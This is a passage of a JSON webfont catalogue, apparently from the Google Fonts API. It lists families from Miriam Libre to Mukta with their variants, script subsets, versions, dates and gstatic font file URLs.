\"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v13\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/miriamlibre/v13/DdTh798HsHwubBAqfkcBTL_vYJn_Teun9g.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/miriamlibre/v13/DdT-798HsHwubBAqfkcBTL_X3LbbRcC7_-Z7Hg.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Mirza\",\n      \"variants\": [\n        \"regular\",\n        \"500\",\n        \"600\",\n        \"700\"\n      ],\n      \"subsets\": [\n        \"arabic\",\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v15\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/mirza/v15/co3ImWlikiN5EurdKMewsrvI.ttf\",\n        \"500\": \"http://fonts.gstatic.com/s/mirza/v15/co3FmWlikiN5EtIpAeO4mafBomDi.ttf\",\n        \"600\": \"http://fonts.gstatic.com/s/mirza/v15/co3FmWlikiN5EtIFBuO4mafBomDi.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/mirza/v15/co3FmWlikiN5EtJhB-O4mafBomDi.ttf\"\n      },\n      \"category\": \"display\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Miss Fajardose\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v22\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/missfajardose/v22/E21-_dn5gvrawDdPFVl-N0Ajb8qvWPaJq4no.ttf\"\n      },\n      \"category\": \"handwriting\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Mitr\",\n      \"variants\": [\n        \"200\",\n        \"300\",\n        \"regular\",\n        \"500\",\n        \"600\",\n        \"700\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\",\n        \"thai\",\n        \"vietnamese\"\n      ],\n      \"version\": \"v11\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"200\": \"http://fonts.gstatic.com/s/mitr/v11/pxiEypw5ucZF8fMZFJDUc1NECPY.ttf\",\n        \"300\": \"http://fonts.gstatic.com/s/mitr/v11/pxiEypw5ucZF8ZcaFJDUc1NECPY.ttf\",\n        \"regular\": \"http://fonts.gstatic.com/s/mitr/v11/pxiLypw5ucZFyTsyMJj_b1o.ttf\",\n        \"500\": \"http://fonts.gstatic.com/s/mitr/v11/pxiEypw5ucZF8c8bFJDUc1NECPY.ttf\",\n        \"600\": \"http://fonts.gstatic.com/s/mitr/v11/pxiEypw5ucZF8eMcFJDUc1NECPY.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/mitr/v11/pxiEypw5ucZF8YcdFJDUc1NECPY.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Mochiy Pop One\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"japanese\",\n        \"latin\"\n      ],\n      \"version\": \"v7\",\n      \"lastModified\": \"2022-09-27\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/mochiypopone/v7/QdVPSTA9Jh-gg-5XZP2UmU4O9kwwD3s6ZKAi.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Mochiy Pop P One\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"japanese\",\n        \"latin\"\n      ],\n      \"version\": \"v7\",\n      \"lastModified\": \"2022-09-27\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/mochiypoppone/v7/Ktk2AKuPeY_td1-h9LayHYWCjAqyN4O3WYZB_sU.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Modak\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"devanagari\",\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v18\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/modak/v18/EJRYQgs1XtIEsnMH8BVZ76KU.ttf\"\n      },\n      \"category\": \"display\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Modern Antiqua\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v22\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/modernantiqua/v22/NGStv5TIAUg6Iq_RLNo_2dp1sI1Ea2u0c3Gi.ttf\"\n      },\n      \"category\": \"display\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Mogra\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"gujarati\",\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v19\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/mogra/v19/f0X40eSs8c95TBo4DvLmxtnG.ttf\"\n      },\n      \"category\": \"display\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Mohave\",\n      \"variants\": [\n        \"300\",\n        \"regular\",\n        \"500\",\n        \"600\",\n        \"700\",\n        \"300italic\",\n        \"italic\",\n        \"500italic\",\n        \"600italic\",\n        \"700italic\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v8\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"300\": \"http://fonts.gstatic.com/s/mohave/v8/7cH0v4ksjJunKqMVAOPIMOeSmiojdif_HvCQopLSvBk.ttf\",\n        \"regular\": \"http://fonts.gstatic.com/s/mohave/v8/7cH0v4ksjJunKqMVAOPIMOeSmiojdnn_HvCQopLSvBk.ttf\",\n        \"500\": \"http://fonts.gstatic.com/s/mohave/v8/7cH0v4ksjJunKqMVAOPIMOeSmiojdkv_HvCQopLSvBk.ttf\",\n        \"600\": \"http://fonts.gstatic.com/s/mohave/v8/7cH0v4ksjJunKqMVAOPIMOeSmiojdqf4HvCQopLSvBk.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/mohave/v8/7cH0v4ksjJunKqMVAOPIMOeSmiojdp74HvCQopLSvBk.ttf\",\n        \"300italic\": \"http://fonts.gstatic.com/s/mohave/v8/7cH2v4ksjJunKqM_CdE36I75AIQkY7G8qLOaprDXrBlSVw.ttf\",\n        \"italic\": \"http://fonts.gstatic.com/s/mohave/v8/7cH2v4ksjJunKqM_CdE36I75AIQkY7G89rOaprDXrBlSVw.ttf\",\n        \"500italic\": \"http://fonts.gstatic.com/s/mohave/v8/7cH2v4ksjJunKqM_CdE36I75AIQkY7G8xLOaprDXrBlSVw.ttf\",\n        \"600italic\": \"http://fonts.gstatic.com/s/mohave/v8/7cH2v4ksjJunKqM_CdE36I75AIQkY7G8KLSaprDXrBlSVw.ttf\",\n        \"700italic\": \"http://fonts.gstatic.com/s/mohave/v8/7cH2v4ksjJunKqM_CdE36I75AIQkY7G8EbSaprDXrBlSVw.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Molengo\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v16\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/molengo/v16/I_uuMpWeuBzZNBtQbbRQkiCvs5Y.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Molle\",\n      \"variants\": [\n        \"italic\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v21\",\n      \"lastModified\": \"2022-04-26\",\n      \"files\": {\n        \"italic\": \"http://fonts.gstatic.com/s/molle/v21/E21n_dL5hOXFhWEsXzgmVydREus.ttf\"\n      },\n      \"category\": \"handwriting\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Monda\",\n      \"variants\": [\n        \"regular\",\n        \"700\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\",\n        \"vietnamese\"\n      ],\n      \"version\": \"v16\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/monda/v16/TK3tWkYFABsmjvpmNBsLvPdG.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/monda/v16/TK3gWkYFABsmjsLaGz8Dl-tPKo2t.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Monofett\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\"\n      ],\n      \"version\": \"v22\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/monofett/v22/mFTyWbofw6zc9NtnW43SuRwr0VJ7.ttf\"\n      },\n      \"category\": \"display\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Monoton\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\"\n      ],\n      \"version\": \"v15\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/monoton/v15/5h1aiZUrOngCibe4fkbBQ2S7FU8.ttf\"\n      },\n      \"category\": \"display\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Monsieur La Doulaise\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v14\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/monsieurladoulaise/v14/_Xmz-GY4rjmCbQfc-aPRaa4pqV340p7EZl5ewkEU4HTy.ttf\"\n      },\n      \"category\": \"handwriting\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Montaga\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\"\n      ],\n      \"version\": \"v13\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/montaga/v13/H4cnBX2Ml8rCkEO_0gYQ7LO5mqc.ttf\"\n      },\n      \"category\": \"serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Montagu Slab\",\n      \"variants\": [\n        \"100\",\n        \"200\",\n        \"300\",\n        \"regular\",\n        \"500\",\n        \"600\",\n        \"700\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\",\n        \"vietnamese\"\n      ],\n      \"version\": \"v6\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"100\": \"http://fonts.gstatic.com/s/montaguslab/v6/6qLhKZIQtB_zv0xUaXRDWkY_HXsphdLRZF40vm_jzR2jhk_n3T6ACkDbE3P9Fs7bOSO7.ttf\",\n        \"200\": \"http://fonts.gstatic.com/s/montaguslab/v6/6qLhKZIQtB_zv0xUaXRDWkY_HXsphdLRZF40vm_jzR2jhk_n3T6ACkBbEnP9Fs7bOSO7.ttf\",\n        \"300\": \"http://fonts.gstatic.com/s/montaguslab/v6/6qLhKZIQtB_zv0xUaXRDWkY_HXsphdLRZF40vm_jzR2jhk_n3T6ACkCFEnP9Fs7bOSO7.ttf\",\n        \"regular\": \"http://fonts.gstatic.com/s/montaguslab/v6/6qLhKZIQtB_zv0xUaXRDWkY_HXsphdLRZF40vm_jzR2jhk_n3T6ACkDbEnP9Fs7bOSO7.ttf\",\n        \"500\": \"http://fonts.gstatic.com/s/montaguslab/v6/6qLhKZIQtB_zv0xUaXRDWkY_HXsphdLRZF40vm_jzR2jhk_n3T6ACkDpEnP9Fs7bOSO7.ttf\",\n        \"600\": \"http://fonts.gstatic.com/s/montaguslab/v6/6qLhKZIQtB_zv0xUaXRDWkY_HXsphdLRZF40vm_jzR2jhk_n3T6ACkAFFXP9Fs7bOSO7.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/montaguslab/v6/6qLhKZIQtB_zv0xUaXRDWkY_HXsphdLRZF40vm_jzR2jhk_n3T6ACkA8FXP9Fs7bOSO7.ttf\"\n      },\n      \"category\": \"serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"MonteCarlo\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\",\n        \"vietnamese\"\n      ],\n      \"version\": \"v7\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/montecarlo/v7/buEzpo6-f9X01GadLA0G0CoV_NxLeiw.ttf\"\n      },\n      \"category\": \"handwriting\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Montez\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\"\n      ],\n      \"version\": \"v18\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/montez/v18/845ZNMk5GoGIX8lm1LDeSd-R_g.ttf\"\n      },\n      \"category\": \"handwriting\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Montserrat\",\n      \"variants\": [\n        \"100\",\n        \"200\",\n        \"300\",\n        \"regular\",\n        \"500\",\n        \"600\",\n        \"700\",\n        \"800\",\n        \"900\",\n        \"100italic\",\n        \"200italic\",\n        \"300italic\",\n        \"italic\",\n        \"500italic\",\n        \"600italic\",\n        \"700italic\",\n        \"800italic\",\n        \"900italic\"\n      ],\n      \"subsets\": [\n        \"cyrillic\",\n        \"cyrillic-ext\",\n        \"latin\",\n        \"latin-ext\",\n        \"vietnamese\"\n      ],\n      \"version\": \"v25\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"100\": \"http://fonts.gstatic.com/s/montserrat/v25/JTUHjIg1_i6t8kCHKm4532VJOt5-QNFgpCtr6Uw-Y3tcoqK5.ttf\",\n        \"200\": \"http://fonts.gstatic.com/s/montserrat/v25/JTUHjIg1_i6t8kCHKm4532VJOt5-QNFgpCvr6Ew-Y3tcoqK5.ttf\",\n        \"300\": \"http://fonts.gstatic.com/s/montserrat/v25/JTUHjIg1_i6t8kCHKm4532VJOt5-QNFgpCs16Ew-Y3tcoqK5.ttf\",\n        \"regular\": \"http://fonts.gstatic.com/s/montserrat/v25/JTUHjIg1_i6t8kCHKm4532VJOt5-QNFgpCtr6Ew-Y3tcoqK5.ttf\",\n        \"500\": \"http://fonts.gstatic.com/s/montserrat/v25/JTUHjIg1_i6t8kCHKm4532VJOt5-QNFgpCtZ6Ew-Y3tcoqK5.ttf\",\n        \"600\": \"http://fonts.gstatic.com/s/montserrat/v25/JTUHjIg1_i6t8kCHKm4532VJOt5-QNFgpCu170w-Y3tcoqK5.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/montserrat/v25/JTUHjIg1_i6t8kCHKm4532VJOt5-QNFgpCuM70w-Y3tcoqK5.ttf\",\n        \"800\": \"http://fonts.gstatic.com/s/montserrat/v25/JTUHjIg1_i6t8kCHKm4532VJOt5-QNFgpCvr70w-Y3tcoqK5.ttf\",\n        \"900\": \"http://fonts.gstatic.com/s/montserrat/v25/JTUHjIg1_i6t8kCHKm4532VJOt5-QNFgpCvC70w-Y3tcoqK5.ttf\",\n        \"100italic\": \"http://fonts.gstatic.com/s/montserrat/v25/JTUFjIg1_i6t8kCHKm459Wx7xQYXK0vOoz6jq6R8aX9-p7K5ILg.ttf\",\n        \"200italic\": \"http://fonts.gstatic.com/s/montserrat/v25/JTUFjIg1_i6t8kCHKm459Wx7xQYXK0vOoz6jqyR9aX9-p7K5ILg.ttf\",\n        \"300italic\": \"http://fonts.gstatic.com/s/montserrat/v25/JTUFjIg1_i6t8kCHKm459Wx7xQYXK0vOoz6jq_p9aX9-p7K5ILg.ttf\",\n        \"italic\": \"http://fonts.gstatic.com/s/montserrat/v25/JTUFjIg1_i6t8kCHKm459Wx7xQYXK0vOoz6jq6R9aX9-p7K5ILg.ttf\",\n        \"500italic\": \"http://fonts.gstatic.com/s/montserrat/v25/JTUFjIg1_i6t8kCHKm459Wx7xQYXK0vOoz6jq5Z9aX9-p7K5ILg.ttf\",\n        \"600italic\": \"http://fonts.gstatic.com/s/montserrat/v25/JTUFjIg1_i6t8kCHKm459Wx7xQYXK0vOoz6jq3p6aX9-p7K5ILg.ttf\",\n        \"700italic\": \"http://fonts.gstatic.com/s/montserrat/v25/JTUFjIg1_i6t8kCHKm459Wx7xQYXK0vOoz6jq0N6aX9-p7K5ILg.ttf\",\n        \"800italic\": \"http://fonts.gstatic.com/s/montserrat/v25/JTUFjIg1_i6t8kCHKm459Wx7xQYXK0vOoz6jqyR6aX9-p7K5ILg.ttf\",\n        \"900italic\": \"http://fonts.gstatic.com/s/montserrat/v25/JTUFjIg1_i6t8kCHKm459Wx7xQYXK0vOoz6jqw16aX9-p7K5ILg.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Montserrat Alternates\",\n      \"variants\": [\n        \"100\",\n        \"100italic\",\n        \"200\",\n        \"200italic\",\n        \"300\",\n        \"300italic\",\n        \"regular\",\n        \"italic\",\n        \"500\",\n        \"500italic\",\n        \"600\",\n        \"600italic\",\n        \"700\",\n        \"700italic\",\n        \"800\",\n        \"800italic\",\n        \"900\",\n        \"900italic\"\n      ],\n      \"subsets\": [\n        \"cyrillic\",\n        \"cyrillic-ext\",\n        \"latin\",\n        \"latin-ext\",\n        \"vietnamese\"\n      ],\n      \"version\": \"v17\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"100\": \"http://fonts.gstatic.com/s/montserratalternates/v17/mFThWacfw6zH4dthXcyms1lPpC8I_b0juU0xiKfVKphL03l4.ttf\",\n        \"100italic\": \"http://fonts.gstatic.com/s/montserratalternates/v17/mFTjWacfw6zH4dthXcyms1lPpC8I_b0juU057p-xIJxp1ml4imo.ttf\",\n        \"200\": \"http://fonts.gstatic.com/s/montserratalternates/v17/mFTiWacfw6zH4dthXcyms1lPpC8I_b0juU0xJIb1ALZH2mBhkw.ttf\",\n        \"200italic\": \"http://fonts.gstatic.com/s/montserratalternates/v17/mFTkWacfw6zH4dthXcyms1lPpC8I_b0juU057p8dAbxD-GVxk3Nd.ttf\",\n        \"300\": \"http://fonts.gstatic.com/s/montserratalternates/v17/mFTiWacfw6zH4dthXcyms1lPpC8I_b0juU0xQIX1ALZH2mBhkw.ttf\",\n        \"300italic\": \"http://fonts.gstatic.com/s/montserratalternates/v17/mFTkWacfw6zH4dthXcyms1lPpC8I_b0juU057p95ArxD-GVxk3Nd.ttf\",\n        \"regular\": \"http://fonts.gstatic.com/s/montserratalternates/v17/mFTvWacfw6zH4dthXcyms1lPpC8I_b0juU0J7K3RCJ1b0w.ttf\",\n        \"italic\": \"http://fonts.gstatic.com/s/montserratalternates/v17/mFThWacfw6zH4dthXcyms1lPpC8I_b0juU057qfVKphL03l4.ttf\",\n        \"500\": \"http://fonts.gstatic.com/s/montserratalternates/v17/mFTiWacfw6zH4dthXcyms1lPpC8I_b0juU0xGIT1ALZH2mBhkw.ttf\",\n        \"500italic\": \"http://fonts.gstatic.com/s/montserratalternates/v17/mFTkWacfw6zH4dthXcyms1lPpC8I_b0juU057p8hA7xD-GVxk3Nd.ttf\",\n        \"600\": \"http://fonts.gstatic.com/s/montserratalternates/v17/mFTiWacfw6zH4dthXcyms1lPpC8I_b0juU0xNIP1ALZH2mBhkw.ttf\",\n        \"600italic\": \"http://fonts.gstatic.com/s/montserratalternates/v17/mFTkWacfw6zH4dthXcyms1lPpC8I_b0juU057p8NBLxD-GVxk3Nd.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/montserratalternates/v17/mFTiWacfw6zH4dthXcyms1lPpC8I_b0juU0xUIL1ALZH2mBhkw.ttf\",\n        \"700italic\": \"http://fonts.gstatic.com/s/montserratalternates/v17/mFTkWacfw6zH4dthXcyms1lPpC8I_b0juU057p9pBbxD-GVxk3Nd.ttf\",\n        \"800\": \"http://fonts.gstatic.com/s/montserratalternates/v17/mFTiWacfw6zH4dthXcyms1lPpC8I_b0juU0xTIH1ALZH2mBhkw.ttf\",\n        \"800italic\": \"http://fonts.gstatic.com/s/montserratalternates/v17/mFTkWacfw6zH4dthXcyms1lPpC8I_b0juU057p91BrxD-GVxk3Nd.ttf\",\n        \"900\": \"http://fonts.gstatic.com/s/montserratalternates/v17/mFTiWacfw6zH4dthXcyms1lPpC8I_b0juU0xaID1ALZH2mBhkw.ttf\",\n        \"900italic\": \"http://fonts.gstatic.com/s/montserratalternates/v17/mFTkWacfw6zH4dthXcyms1lPpC8I_b0juU057p9RB7xD-GVxk3Nd.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Montserrat Subrayada\",\n      \"variants\": [\n        \"regular\",\n        \"700\"\n      ],\n      \"subsets\": [\n        \"latin\"\n      ],\n      \"version\": \"v17\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/montserratsubrayada/v17/U9MD6c-o9H7PgjlTHThBnNHGVUORwteQQE8LYuceqGT-.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/montserratsubrayada/v17/U9MM6c-o9H7PgjlTHThBnNHGVUORwteQQHe3TcMWg3j36Ebz.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Moo Lah Lah\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\",\n        \"vietnamese\"\n      ],\n      \"version\": \"v3\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/moolahlah/v3/dg4h_p_opKZOA0w1AYcm55wtYQYugjW4.ttf\"\n      },\n      \"category\": \"display\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Moon Dance\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\",\n        \"vietnamese\"\n      ],\n      \"version\": \"v3\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/moondance/v3/WBLgrEbUbFlYW9ekmGawe2XiKMiokE4.ttf\"\n      },\n      \"category\": \"handwriting\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Moul\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"khmer\",\n        \"latin\"\n      ],\n      \"version\": \"v25\",\n      \"lastModified\": \"2022-04-26\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/moul/v25/nuF2D__FSo_3E-RYiJCy-00.ttf\"\n      },\n      \"category\": \"display\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Moulpali\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"khmer\",\n        \"latin\"\n      ],\n      \"version\": \"v28\",\n      \"lastModified\": \"2022-04-26\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/moulpali/v28/H4ckBXKMl9HagUWymyY6wr-wg763.ttf\"\n      },\n      \"category\": \"display\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Mountains of Christmas\",\n      \"variants\": [\n        \"regular\",\n        \"700\"\n      ],\n      \"subsets\": [\n        \"latin\"\n      ],\n      \"version\": \"v20\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/mountainsofchristmas/v20/3y9w6a4zcCnn5X0FDyrKi2ZRUBIy8uxoUo7ePNamMPNpJpc.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/mountainsofchristmas/v20/3y9z6a4zcCnn5X0FDyrKi2ZRUBIy8uxoUo7eBGqJFPtCOp6IaEA.ttf\"\n      },\n      \"category\": \"display\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Mouse Memoirs\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v13\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/mousememoirs/v13/t5tmIRoSNJ-PH0WNNgDYxdSb7TnFrpOHYh4.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Mr Bedfort\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v21\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/mrbedfort/v21/MQpR-WCtNZSWAdTMwBicliq0XZe_Iy8.ttf\"\n      },\n      \"category\": \"handwriting\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Mr Dafoe\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v14\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/mrdafoe/v14/lJwE-pIzkS5NXuMMrGiqg7MCxz_C.ttf\"\n      },\n      \"category\": \"handwriting\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Mr De Haviland\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v14\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/mrdehaviland/v14/OpNVnooIhJj96FdB73296ksbOj3C4ULVNTlB.ttf\"\n      },\n      \"category\": \"handwriting\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Mrs Saint Delafield\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v13\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/mrssaintdelafield/v13/v6-IGZDIOVXH9xtmTZfRagunqBw5WC62cK4tLsubB2w.ttf\"\n      },\n      \"category\": \"handwriting\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Mrs Sheppards\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v21\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/mrssheppards/v21/PN_2Rfm9snC0XUGoEZhb91ig3vjxynMix4Y.ttf\"\n      },\n      \"category\": \"handwriting\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Ms Madi\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\",\n        \"vietnamese\"\n      ],\n      \"version\": \"v2\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/msmadi/v2/HTxsL2UxNnOji5E1N-DPiI7QAYo.ttf\"\n      },\n      \"category\": \"handwriting\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Mukta\",\n      \"variants\": [\n        \"200\",\n        \"300\",\n        \"regular\",\n        \"500\",\n        \"600\",\n        \"700\",\n        \"800\"\n      ],\n      \"subsets\": [\n        \"devanagari\",\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v13\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"200\": \"http://fonts.gstatic.com/s/mukta/v13/iJWHBXyXfDDVXbEOjFma-2HW7ZB_.ttf\",\n        \"300\": \"http://fonts.gstatic.com/s/mukta/v13/iJWHBXyXfDDVXbFqj1ma-2HW7ZB_.ttf\",\n        \"regular\": \"http://fonts.gstatic.com/s/mukta/v13/iJWKBXyXfDDVXYnGp32S0H3f.ttf\",\n        \"500\": \"http://fonts.gstatic.com/s/mukta/v13/iJWHBXyXfDDVXbEyjlma-2HW7ZB_.ttf\",\n        \"600\": \"http://fonts.gstatic.com/s/mukta/v13/iJWHBXyXfDDVXbEeiVma-2HW7ZB_.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/mukta/v13/iJWHBXyXfDDVXbF6iFma-2HW7ZB_.ttf\",\n        \"800\": \"http://fonts.gstatic.com/s/mukta/v13/iJWHBXyXfDDVXbFmi1ma-2HW7ZB_.ttf\"\n      },\n      \"category\": 